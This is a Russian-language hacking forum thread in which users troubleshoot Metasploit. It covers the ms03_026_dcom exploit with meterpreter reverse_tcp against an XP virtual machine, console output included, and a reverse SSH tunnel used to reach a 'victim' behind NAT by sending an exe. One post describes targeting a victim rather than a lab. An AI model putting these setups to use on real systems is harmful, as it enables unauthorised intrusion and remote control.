Это в гостевых ОС или в основной? P.S. Я вот тоже третий раз качаю прошивку в архиве и снова битый архив...
если под виртуалкой то же самое, скорее всего битый дистрибутив, качай ещё раз. Пишет же либо не полный дистриб, либо повреждённый.
антвирь есть? может он что-то режет при закачке, отключи нафиг... Может у прова траф проверяется и тоже срезает... там же куча сплоитов и т.д. = вирусный траф как бэ...
Попробуй скачать с другого провайдера, может пров режет вирусный траф, больше не вижу вариантов (кроме как 3G-интернет - УГ).
Все получилось, решилось так... Скачал с виртуалки и все ок. Кстати можно твою аську -=lebed=- хочу пару вопросов задать. Если тебе не сложно.
Поставил на вирт. машину Win XP SP2, и пытаюсь залить на неё через Metasploit эксплоит ms03_026_dcom с начинкой windows/meterpreter/reverse_tcp. Прописываю удаленный хост/порт, и локальный. В итоге выдает: Started reverse handler on 172.16.0.12:4444 [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.0.15[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.0.15[135] ... [*] Sending exploit ... [*] Exploit completed, but no session was created. Никак сессию открывать не хочет Обе машины взаимно пингуются, в одной сети, IP присваиваются роутером. Подскажите, в чем косяк может быть? Спасибо заранее!
Просто эксплоит работает на: Microsoft Windows XP Professional SP1 Microsoft Windows XP Professional Microsoft Windows XP Home SP1 Microsoft Windows XP Home Microsoft Windows XP 64-bit Edition SP1 Microsoft Windows XP 64-bit Edition ... на Вашей системе скорее всего имеется патч (имею ввиду SP2)
если я выхожу в инет через 3G-модем, чтобы подгрузитть meterpreter/reverse возможно ли использовать ssh туннель через сервер с белым IP или веб-шелл?
Всем привет! Продолжаю свои вопросы ) дело обстоит следующим образом: есть сервер с прямым IP, есть домашняя машина с 3G модемом. И жертва за NAT-ом. На домашней машине пробрасываю обратный ssh-туннель до сервера, запускаю multi/handler и закидываю жертве exe с windows/meterpreter/reverce_tcp, который стучится на проброшенный порт сервера. на домашней машине открывается сессия, но любая команда приводит вот к этому:"Session manipulation failed: Validation failed: Address is reserved". Подскажите что я делаю не так
ось ХР, установил Metasploit Pro, таже консоль как на frameworke, но кроме хелпа, подключения к базе, и show, другие команды не работает, почему?
Установил Metasploit Pro c оф.сайта. Набираю в консоли: Code: msf-pro > use exploit/windows/browser/ie_cbutton_uaf [-] Failed to load module: exploit/windows/browser/ie_cbutton_uaf В чем дело? [update] Разобрался. Еще вопрос: почему в свежескачанном метасплойте нет уязвимости ИЕ от 27 декабря прошлого года? Где ее взять для метасплойта? [update-2] Разобрался =) Кто где берет виртуальные ОСи для тестов? Неужели сами ставите? ))